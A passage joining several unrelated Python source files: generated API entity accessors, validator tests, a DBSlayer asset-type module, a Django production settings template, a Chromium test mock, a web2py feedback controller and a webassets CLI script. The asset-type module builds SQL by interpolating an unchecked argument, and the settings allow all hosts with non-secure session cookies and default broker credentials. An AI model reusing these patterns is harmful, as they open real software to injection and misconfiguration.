                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        return self._embedded_metadata

    @embedded_metadata.setter
    def embedded_metadata(self, value):
        """ Set embedded_metadata value.

            Notes:
                Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.

                
                This attribute is named `embeddedMetadata` in VSD API.
                
        """
        self._embedded_metadata = value

    
    @property
    def entity_scope(self):
        """ Get entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        return self._entity_scope

    @entity_scope.setter
    def entity_scope(self, value):
        """ Set entity_scope value.

            Notes:
                Specify if scope of entity is Data center or Enterprise level

                
                This attribute is named `entityScope` in VSD API.
                
        """
        self._entity_scope = value

    
    @property
    def creation_date(self):
        """ Get creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        return self._creation_date

    @creation_date.setter
    def creation_date(self, value):
        """ Set creation_date value.

            Notes:
                Time stamp when this object was created.

                
                This attribute is named `creationDate` in VSD API.
                
        """
        self._creation_date = value

    
    @property
    def status(self):
        """ Get status value.

            Notes:
                Status of the resync

                
        """
        return self._status

    @status.setter
    def status(self, value):
        """ Set status value.

            Notes:
                Status of the resync

                
        """
        self._status = value

    
    @property
    def owner(self):
        """ Get owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        return self._owner

    @owner.setter
    def owner(self, value):
        """ Set owner value.

            Notes:
                Identifies the user that has created this object.

                
        """
        self._owner = value

    
    @property
    def external_id(self):
        """ Get external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        return self._external_id

    @external_id.setter
    def external_id(self, value):
        """ Set external_id value.

            Notes:
                External object ID. Used for integration with third party systems

                
                This attribute is named `externalID` in VSD API.
                
        """
        self._external_id = value

    

    
from mock import patch
from nose.tools import eq_

from helper import TestCase

import appvalidator.submain as submain


class TestSubmainPackage(TestCase):
    @patch("appvalidator.submain.test_inner_package",
           lambda x, z: "success")
    def test_package_pass(self):
        "Tests the test_package function with simple data"

        self.setup_err()

        name = "tests/resources/submain/install_rdf.xpi"
        with open(name) as pack:
            result = submain.test_package(self.err, pack, name)

        self.assert_silent()
        eq_(result, "success")

    @patch("appvalidator.submain.test_inner_package",
           lambda x, z: "success")
    def test_package_corrupt(self):
        "Tests the test_package function fails with a non-zip"

        self.setup_err()

        name = "tests/resources/junk.xpi"
        with open(name) as pack:
            result = submain.test_package(self.err, pack, name)

        self.assert_failed()

    def test_package_corrupt(self):
        "Tests the test_package function fails with a corrupt file"

        self.setup_err()

        name = "tests/resources/corrupt.xpi"
        result = submain.test_package(self.err, name, name)

        self.assert_failed(with_errors=True, with_warnings=True)

# Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de
# Aplicacion de las TIC basadas en Fuentes Abiertas, Spain.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
#   Redistributions of source code must retain the above copyright
#   notice, this list of conditions and the following disclaimer.
#
#   Redistributions in binary form must reproduce the above copyright
#   notice, this list of conditions and the following disclaimer in
#   the documentation and/or other materials provided with the
#   distribution.
#
#   Neither the name of the CENATIC nor the names of its contributors
#   may be used to endorse or promote products derived from this
#   software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You may contact the copyright holder at: Fundacion CENATIC, Edificio
# de Servicios Sociales: C/ Vistahermosa, 1, 3ra planta, 06200
# Almendralejo (Badajoz), Spain

from DBSlayer import Query

def get_type_name (type_id):
    l = get_type (type_id)
    if not l:
        return None
    return l['name']

def get_type (type_id):
    q = "SELECT id, type "\
        "FROM asset_types WHERE id=%(type_id)s;" % locals()

    query = Query(q)
    if len(query) != 1:
        return None

    ret = {'id':          type_id,
           'name':        query['type'][0]}
    return ret

def get_types ():
    q = "SELECT id, type "\
        "FROM asset_types;" % locals()

    query = Query(q)

    if not len(query):
        return None

    ret = []
    for x in query:
        d={'id':          query[x]['id'],
           'name':        query[x]['type']}
        ret.append(d)
    return ret


def test ():
    import sys

    try:
        type_id = sys.argv[1]
    except IndexError:
        print 'Required test parameters: type_id'
        sys.exit(1)

    print 'Types:', get_types()
    print 'type_id %s, type_name %s' % (type_id, get_type_name(type_id))
    print get_type(type_id),

if __name__ == '__main__':
    test()

# -*- coding: utf-8 -*-
'''
Production Configurations

- Use djangosecure
- Use mailgun to send emails
- Use redis
'''
from __future__ import absolute_import, unicode_literals

from django.utils import six

from .common import *  # noqa

# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")

# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

# django-secure
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("djangosecure", )

MIDDLEWARE_CLASSES = (
    # Make sure djangosecure.middleware.SecurityMiddleware is listed first
    'djangosecure.middleware.SecurityMiddleware',
) + MIDDLEWARE_CLASSES

# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool("DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool("DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)

# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ["*"]
# END SITE CONFIGURATION



# EMAIL
# ------------------------------------------------------------------------------
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
                         default='{{cookiecutter.project_name}} <noreply@{{cookiecutter.domain_name}}>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[{{cookiecutter.project_name}}] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)

# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
    ('django.template.loaders.cached.Loader', [
        'django.template.loaders.filesystem.Loader',
        'django.template.loaders.app_directories.Loader',
    ]),
]

# CACHE CONFIGURATION
# ------------------------------------------------------------------------------

CACHES = {
    'default': {
        'BACKEND': 'redis_cache.RedisCache',
        'LOCATION': [
            'redis:6379',
        ],
        'OPTIONS': {
            'DB': 1,
            'PARSER_CLASS': 'redis.connection.HiredisParser',
            'CONNECTION_POOL_CLASS': 'redis.BlockingConnectionPool',
            'CONNECTION_POOL_CLASS_KWARGS': {
                'max_connections': 50,
                'timeout': 20,
            },
            'MAX_CONNECTIONS': 1000,
            'PICKLE_VERSION': -1,
        },
    },
}

# ASSET CONFIGURATION
# ------------------------------------------------------------------------------

STATIC_URL = '/static/'
MEDIA_URL = '/media/'

STATIC_ROOT = '/static'
MEDIA_ROOT = '/media'


STATICFILES_DIRS = (
    unicode(APPS_DIR.path("static")),
)

{% if cookiecutter.use_celery %}
# CELERY BROKER CONFIGURATION
# ------------------------------------------------------------------------------
BROKER_URL = "amqp://guest:guest@rabbitmq:5672//"
{% endif %}

{% if cookiecutter.use_sentry %}
# SENTRY CONFIGURATION
# ------------------------------------------------------------------------------
RAVEN_CONFIG = {
    'dsn': env("SENTRY_URL"),
}

INSTALLED_APPS = INSTALLED_APPS + (
    'raven.contrib.django.raven_compat',
)
{% endif %}

# Your production stuff: Below this line define 3rd party library settings

# Copyright (c) 2013 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package containing the different outputs.

Each output type is defined inside a module.

"""

# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
#    * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#    * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#    * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from collections import namedtuple

from blinkpy.common.net.results_fetcher import TestResultsFetcher

BuilderStep = namedtuple('BuilderStep', ['build', 'step_name'])

# TODO(qyearsley): To be consistent with other fake ("mock") classes, this
# could be changed so it's not a subclass of TestResultsFetcher.
class MockTestResultsFetcher(TestResultsFetcher):
    def __init__(self):
        super(MockTestResultsFetcher, self).__init__()
        self._canned_results = {}
        self._canned_retry_summary_json = {}
        self._webdriver_results = {}
        self.fetched_builds = []
        self.fetched_webdriver_builds = []
        self._layout_test_step_name = 'blink_web_tests (with patch)'

    def set_results(self, build, results, step_name=None):
        step_name = step_name or self.get_layout_test_step_name(build)
        step = BuilderStep(build=build, step_name=step_name)
        self._canned_results[step] = results

    def fetch_results(self, build, full=False, step_name=None):
        step_name = step_name or self.get_layout_test_step_name(build)
        step = BuilderStep(build=build, step_name=step_name)
        self.fetched_builds.append(step)
        return self._canned_results.get(step)

    def set_results_to_resultdb(self, build, results):
        self._canned_results[build.build_id] = results

    def fetch_results_from_resultdb(self, host, builds, predicate):
        rv = []
        for build in builds:
            results = self._canned_results.get(build.build_id)
            if results:
                rv.extend(results)
        return rv

    def set_webdriver_test_results(self, build, m, results):
        self._webdriver_results[(build, m)] = results

    def fetch_webdriver_test_results(self, build, m):
        self.fetched_webdriver_builds.append((build, m))
        return self._webdriver_results.get((build, m))

    def set_retry_sumary_json(self, build, content):
        self._canned_retry_summary_json[build] = content

    def fetch_retry_summary_json(self, build):
        return self._canned_retry_summary_json.get(build)

    def set_layout_test_step_name(self, name):
        self._layout_test_step_name = name

    def get_layout_test_step_name(self, build):
        return self._layout_test_step_name

# -*- coding: utf-8 -*-

import access
import util

@auth.requires_login()
def index():
    """Produces a list of the feedback obtained for a given venue,
    or for all venues."""
    venue_id = request.args(0)
    if venue_id == 'all':
        q = (db.submission.user == get_user_email())
    else:
        q = ((db.submission.user == get_user_email()) 
            & (db.submission.venue_id == venue_id))
    db.submission.id.represent = lambda x, r: A(T('View'), _class='btn', _href=URL('submission', 'view_own_submission', args=['v', r.id]))
    db.submission.id.label = T('Submission')
    db.submission.id.readable = True
    db.submission.venue_id.readable = True
    grid = SQLFORM.grid(q,
        fields=[db.submission.id, db.submission.venue_id,
                db.submission.date_created, db.submission.date_updated, ],
        csv=False, details=False, create=False, editable=False, deletable=False,
        args=request.args[:1],
        maxtextlength=24,        
        )
    return dict(grid=grid)


@auth.requires_login()
def view_feedback():
    """Shows detailed feedback for a user in a venue.
    This controller accepts various types of arguments: 
    * 's', submission_id
    * 'u', venue_id, username
    * 'v', venue_id  (in which case, shows own submission to that venue)
    """
    if len(request.args) == 0:
        redirect(URL('default', 'index'))
    if request.args(0) == 's':
        # submission_id
        n_args = 2
        subm = db.submission(request.args(1)) or redirect(URL('default', 'index'))
        c = db.venue(subm.venue_id) or redirect(URL('default', 'index'))
        username = subm.user
    elif request.args(0) == 'v':
        # venue_id
        n_args = 2
        c = db.venue(request.args(1)) or redirect(URL('default', 'index'))
        username = get_user_email()
        subm = db((db.submission.user == username) & (db.submission.venue_id == c.id)).select().first()
    else:
        # venue_id, username
        n_args = 3
        c = db.venue(request.args(1)) or redirect(URL('default', 'index'))
        username = request.args(2) or redirect(URL('default', 'index'))
        subm = db((db.submission.user == username) & (db.submission.venue_id == c.id)).select().first()

    # Checks permissions.
    props = db(db.user_properties.user == get_user_email()).select().first()
    if props == None:
        session.flash = T('Not authorized.')
        redirect(URL('default', 'index'))
    is_author = (username == get_user_email())
    can_view_feedback = access.can_view_feedback(c, props) or is_author
    if (not can_view_feedback):
        session.flash = T('Not authorized.')
        redirect(URL('default', 'index'))
    if not (access.can_view_feedback(c, props) or datetime.utcnow() > c.rate_close_date):
        session.flash = T('The ratings are not yet available.')
        redirect(URL('feedback', 'index', args=['all']))

    # Produces the link to edit the feedback.
    edit_feedback_link = None
    if subm is not None and access.can_observe(c, props):
        edit_feedback_link = A(T('Edit feedback'), _class='btn', 
                               _href=URL('submission', 'edit_feedback', args=[subm.id]))
    # Produces the download link.
    download_link = None
    if subm is not None and c.allow_file_upload and subm.content is not None:
        if is_author:
            download_link = A(T('Download'), _class='btn', 
                          _href=URL('submission', 'download_author', args=[subm.id, subm.content]))
        else:
            download_link = A(T('Download'), _class='btn', 
                          _href=URL('submission', 'download_manager', args=[subm.id, subm.content]))
    venue_link = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))

    # Submission link.
    subm_link = None
    if subm is not None and c.allow_link_submission:
        subm_link = A(subm.link, _href=subm.link)
    # Submission content and feedback.
    subm_comment = None
    subm_feedback = None
    if subm is not None:
        raw_subm_comment = keystore_read(subm.comment)
        if raw_subm_comment is not None and len(raw_subm_comment) > 0:
            subm_comment = MARKMIN(keystore_read(subm.comment))
        raw_feedback = keystore_read(subm.feedback)
        if raw_feedback is not None and len(raw_feedback) > 0:
            subm_feedback = MARKMIN(raw_feedback)
    # Display settings.
    db.submission.percentile.readable = True
    db.submission.comment.readable = True
    db.submission.feedback.readable = True
    if access.can_observe(c, props):
        db.submission.quality.readable = True
        db.submission.error.readable = True
    # Reads the grade information.
    submission_grade = submission_percentile = None
    review_grade = review_percentile = user_reputation = None
    final_grade = final_percentile = None
    assigned_grade = None
    if c.grades_released:
        grade_info = db((db.grades.user == username) & (db.grades.venue_id == c.id)).select().first()
        if grade_info is not None:
            submission_grade = represent_quality(grade_info.submission_grade, None)
            submission_percentile = represent_percentage(grade_info.submission_percentile, None)
            review_grade = represent_quality_10(grade_info.accuracy, None)
            review_percentile = represent_percentage(grade_info.accuracy_percentile, None)
            user_reputation = represent_01_as_percentage(grade_info.reputation, None)
            final_grade = represent_quality(grade_info.grade, None)
            final_percentile = represent_percentage(grade_info.percentile, None)
            assigned_grade = represent_quality(grade_info.assigned_grade, None)
    # Makes a grid of comments.
    db.task.submission_name.readable = False
    db.task.assigned_date.readable = False
    db.task.completed_date.readable = False
    db.task.rejected.readable = True
    db.task.helpfulness.readable = db.task.helpfulness.writable = True
    # Prevent editing the comments; the only thing editable should be the "is bogus" field.
    db.task.comments.writable = False
    db.task.comments.readable = True
    ranking_link = None
    if access.can_observe(c, props):
        db.task.user.readable = True
        db.task.completed_date.readable = True
        links = [
            dict(header=T('Review details'), body= lambda r:
                 A(T('View'), _class='btn', _href=URL('ranking', 'view_comparison', args=[r.id]))),
            ]
        details = False
        if subm is not None:
            ranking_link = A(T('details'), _href=URL('ranking', 'view_comparisons_given_submission', args=[subm.id]))
        reviews_link = A(T('details'), _href=URL('ranking', 'view_comparisons_given_user', args=[username, c.id]))
        db.task.user.represent = lambda v, r: A(v, _href=URL('ranking', 'view_comparisons_given_user',
                                                                   args=[v, c.id], user_signature=True))
    else:
        user_reputation = None
        links = [
            dict(header=T('Review feedback'), body = lambda r:
                 A(T('Give feedback'), _class='btn', 
                   _href=URL('feedback', 'reply_to_review', args=[r.id], user_signature=True))),
            ]
        details = False
        ranking_link = None
        reviews_link = None
    if subm is not None:
        q = ((db.task.submission_id == subm.id) & (db.task.is_completed == True))
        # q = (db.task.submission_id == subm.id)
    else:
        q = (db.task.id == -1)
    grid = SQLFORM.grid(q,
        fields=[db.task.id, db.task.user, db.task.rejected, db.task.comments, db.task.helpfulness, ],
        details = details,
        csv=False, create=False, editable=False, deletable=False, searchable=False,
        links=links,
        args=request.args[:n_args],
        maxtextlength=24,
        )
    return dict(subm=subm, download_link=download_link, subm_link=subm_link, username=username,
                subm_comment=subm_comment, subm_feedback=subm_feedback,
                edit_feedback_link=edit_feedback_link,
                is_admin=is_user_admin(), 
                submission_grade=submission_grade, submission_percentile=submission_percentile, 
                review_grade=review_grade, review_percentile=review_percentile,
                user_reputation=user_reputation,
                final_grade=final_grade, final_percentile=final_percentile, 
                assigned_grade=assigned_grade,
                venue_link=venue_link, grid=grid, ranking_link=ranking_link,
                reviews_link=reviews_link)


@auth.requires_signature()    
def reply_to_review():
    t = db.task(request.args(0)) or redirect(URL('default', 'index'))
    db.task.submission_name.readable = False
    db.task.assigned_date.readable = False
    db.task.completed_date.readable = False
    db.task.comments.readable = False
    db.task.helpfulness.readable = db.task.helpfulness.writable = True
    db.task.feedback.readable = db.task.feedback.writable = True
    form = SQLFORM(db.task, record=t)
    form.vars.feedback = keystore_read(t.feedback)
    if form.process(onvalidation=validate_review_feedback(t)).accepted:
        session.flash = T('Updated.')
        redirect(URL('feedback', 'view_feedback', args=['s', t.submission_id]))
    link_to_submission = A(T('View submission'), _href=URL('submission', 'view_own_submission', args=['v', t.submission_id]))
    review_comments = MARKMIN(keystore_read(t.comments))
    return dict(form=form, link_to_submission=link_to_submission, review_comments=review_comments)
    

def validate_review_feedback(t):
    def f(form):
        if not form.errors:
            feedback_id = keystore_update(t.feedback, form.vars.feedback)
            form.vars.feedback = feedback_id
    return f


@auth.requires_login()
def view_my_reviews():
    """This controller displays the reviews a user has written for a venue, along with
    the feedback they received."""
    c = db.venue(request.args(0)) or redirect(URL('rating', 'review_index'))
    link_to_venue = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
    link_to_eval = A(T('My evaluation in this venue'), _class='btn', 
                     _href=URL('feedback', 'view_feedback', args=['v', c.id]))
    q = ((db.task.user == get_user_email()) & (db.task.venue_id == c.id))
    db.task.rejected.readable = True
    db.task.helpfulness.readable = True
    db.task.comments.readable = True
    db.task.feedback.readable = True
    # To prevent chopping
    db.task.submission_name.represent = represent_text_field
    grid = SQLFORM.grid(q,
        fields=[db.task.submission_name, db.task.rejected, db.task.helpfulness],
        details=True,
        editable=False, deletable=False, create=False, searchable=False,
        csv=False,
        args=request.args[:1],
        maxtextlength=24,
        )
    return dict(grid=grid, link_to_venue=link_to_venue, link_to_eval=link_to_eval)

from __future__ import print_function
import shutil
import os, sys
import time
import logging

from .loaders import PythonLoader, YAMLLoader
from .bundle import get_all_bundle_files
from .exceptions import BuildError
from .updater import TimestampUpdater
from .merge import MemoryHunk
from .version import get_manifest
from .cache import FilesystemCache
from .utils import set, StringIO


__all__ = ('CommandError', 'CommandLineEnvironment', 'main')


# logging has WARNING as default level, for the CLI we want INFO. Set this
# as early as possible, so that user customizations will not be overwritten.
logging.getLogger('webassets.script').setLevel(logging.INFO)


class CommandError(Exception):
    pass


class Command(object):
    """Base-class for a command used by :class:`CommandLineEnvironment`.

    Each command being a class opens up certain possibilities with respect to
    subclassing and customizing the default CLI.
    """

    def __init__(self, cmd_env):
        self.cmd = cmd_env

    def __getattr__(self, name):
        # Make stuff from cmd environment easier to access
        return getattr(self.cmd, name)

    def __call__(self, *args, **kwargs):
        raise NotImplementedError()


class BuildCommand(Command):

    def __call__(self, bundles=None, output=None, directory=None, no_cache=None,
              manifest=None, production=None):
        """Build assets.

        ``bundles``
            A list of bundle names. If given, only this list of bundles
            should be built.

        ``output``
            List of (bundle, filename) 2-tuples. If given, only these
            bundles will be built, using the custom output filenames.
            Cannot be used with ``bundles``.

        ``directory``
            Custom output directory to use for the bundles. The original
            basenames defined in the bundle ``output`` attribute will be
            used. If the ``output`` of the bundles are pointing to different
            directories, they will be offset by their common prefix.
            Cannot be used with ``output``.

        ``no_cache``
            If set, a cache (if one is configured) will not be used.

        ``manifest``
            If set, the given manifest instance will be used, instead of
            any that might have been configured in the Environment. The value
            passed will be resolved through ``get_manifest()``. If this fails,
            a file-based manifest will be used using the given value as the
            filename.

        ``production``
            If set to ``True``, then :attr:`Environment.debug`` will forcibly
            be disabled (set to ``False``) during the build.
        """

        # Validate arguments
        if bundles and output:
            raise CommandError(
                'When specifying explicit output filenames you must '
                'do so for all bundles you want to build.')
        if directory and output:
            raise CommandError('A custom output directory cannot be '
                               'combined with explicit output filenames '
                               'for individual bundles.')

        if production:
            # TODO: Reset again (refactor commands to be classes)
            self.environment.debug = False

        # TODO: Oh how nice it would be to use the future options stack.
        if manifest is not None:
            try:
                manifest = get_manifest(manifest, env=self.environment)
            except ValueError:
                manifest = get_manifest(
                    # abspath() is important, or this will be considered
                    # relative to Environment.directory.
                    "file:%s" % os.path.abspath(manifest),
                    env=self.environment)
            self.environment.manifest = manifest

        # Use output as a dict.
        if output:
            output = dict(output)

        # Validate bundle names
        bundle_names = bundles if bundles else (output.keys() if output else [])
        for name in bundle_names:
            if not name in self.environment:
                raise CommandError(
                    'I do not know a bundle name named "%s".' % name)

        # Make a list of bundles to build, and the filename to write to.
        if bundle_names:
            # TODO: It's not ok to use an internal property here.
            bundles = [(n,b) for n, b in self.environment._named_bundles.items()
                             if n in bundle_names]
        else:
            # Includes unnamed bundles as well.
            bundles = [(None, b) for b in self.environment]

        # Determine common prefix for use with ``directory`` option.
        if directory:
            prefix = os.path.commonprefix(
                [os.path.normpath(b.resolve_output())
                 for _, b in bundles if b.output])
            # dirname() gives the right value for a single file.
            prefix = os.path.dirname(prefix)

        to_build = []
        for name, bundle in bundles:
            # TODO: We really should support this. This error here
            # is just in place of a less understandable error that would
            # otherwise occur.
            if bundle.is_container and directory:
                raise CommandError(
                    'A custom output directory cannot currently be '
                    'used with container bundles.')

            # Determine which filename to use, if not the default.
            overwrite_filename = None
            if output:
                overwrite_filename = output[name]
            elif directory:
                offset = os.path.normpath(
                    bundle.resolve_output())[len(prefix)+1:]
                overwrite_filename = os.path.join(directory, offset)
            to_build.append((bundle, overwrite_filename, name,))

        # Build.
        built = []
        for bundle, overwrite_filename, name in to_build:
            if name:
                # A name is not necessary available of the bundle was
                # registered without one.
                self.log.info("Building bundle: %s (to %s)" % (
                    name, overwrite_filename or bundle.output))
            else:
                self.log.info("Building bundle: %s" % bundle.output)

            try:
                if not overwrite_filename:
                    with bundle.bind(self.environment):
                        bundle.build(force=True, disable_cache=no_cache)
                else:
                    # TODO: Rethink how we deal with container bundles here.
                    # As it currently stands, we write all child bundles
                    # to the target output, merged (which is also why we
                    # create and force writing to a StringIO instead of just
                    # using the ``Hunk`` objects that build() would return
                    # anyway.
                    output = StringIO()
                    with bundle.bind(self.environment):
                        bundle.build(force=True, output=output,
                            disable_cache=no_cache)
                    if directory:
                        # Only auto-create directories in this mode.
                        output_dir = os.path.dirname(overwrite_filename)
                        if not os.path.exists(output_dir):
                            os.makedirs(output_dir)
                    MemoryHunk(output.getvalue()).save(overwrite_filename)
                built.append(bundle)
            except BuildError as e:
                self.log.error("Failed, error was: %s" % e)
        if len(built):
            self.event_handlers['post_build']()
        if len(built) != len(to_build):
            return 2


class WatchCommand(Command):

    def __call__(self, loop=None):
        """Watch assets for changes.

        ``loop``
            A callback, taking no arguments, to be called once every loop
            iteration. Can be useful to integrate the command with other code.
            If not specified, the loop wil call ``time.sleep()``.
        """
        # TODO: This should probably also restart when the code changes.
        mtimes = {}

        try:
            # Before starting to watch for changes, also recognize changes
            # made while we did not run, and apply those immediately.
            for bundle in self.environment:
                print('Bringing up to date: %s' % bundle.output)
                bundle.build(force=False)

            self.log.info("Watching %d bundles for changes..." %
                          len(self.environment))

            while True:
                changed_bundles = self.check_for_changes(mtimes)

                built = []
                for bundle in changed_bundles:
                    print("Building bundle: %s ..." % bundle.output, end=' ')
                    sys.stdout.flush()
                    try:
                        bundle.build(force=True)
                        built.append(bundle)
                    except BuildError as e:
                        print("")
                        print("Failed: %s" % e)
                    else:
                        print("done")

                if len(built):
                    self.event_handlers['post_build']()

                do_end = loop() if loop else time.sleep(0.1)
                if do_end:
                    break
        except KeyboardInterrupt:
            pass

    def check_for_changes(self, mtimes):
        # Do not update original mtimes dict right away, so that we detect
        # all bundle changes if a file is in multiple bundles.
        _new_mtimes = mtimes.copy()

        changed_bundles = set()
        # TODO: An optimization was lost here, skipping a bundle once
        # a single file has been found to have changed. Bring back.
        for filename, bundles_to_update in self.yield_files_to_watch():
            stat = os.stat(filename)
            mtime = stat.st_mtime
            if sys.platform == "win32":
                mtime -= stat.st_ctime

            if mtimes.get(filename, mtime) != mtime:
                if callable(bundles_to_update):
                    # Hook for when file has changed
                    try:
                        bundles_to_update = bundles_to_update()
                    except EnvironmentError:
                        # EnvironmentError is what the hooks is allowed to
                        # raise for a temporary problem, like an invalid config
                        import traceback
                        traceback.print_exc()
                        # Don't update anything, wait for another change
                        bundles_to_update = set()

                if bundles_to_update is True:
                    # Indicates all bundles should be rebuilt for the change
                    bundles_to_update = set(self.environment)
                changed_bundles |= bundles_to_update
                _new_mtimes[filename] = mtime
            _new_mtimes[filename] = mtime

        mtimes.update(_new_mtimes)
        return changed_bundles

    def yield_files_to_watch(self):
        for bundle in self.environment:
            for filename in get_all_bundle_files(bundle):
                yield filename, set([bundle])


class CleanCommand(Command):

    def __call__(self):
        """Delete generated assets.
        """
        self.log.info('Cleaning generated assets...')
        for bundle in self.environment:
            if not bundle.output:
                continue
            file_path = bundle.resolve_output(self.environment)
            if os.path.exists(file_path):
                os.unlink(file_path)
                self.log.info("Deleted asset: %s" % bundle.output)
        if isinstance(self.environment.cache, FilesystemCache):
            shutil.rmtree(self.environment.cache.directory)


class CheckCommand(Command):

    def __call__(self):
        """Check to see if assets need to be rebuilt.

        A non-zero exit status will be returned if any of the input files are
        newer (based on mtime) than their output file. This is intended to be
        used in pre-commit hooks.
        """
        needsupdate = False
        updater = self.environment.updater
        if not updater:
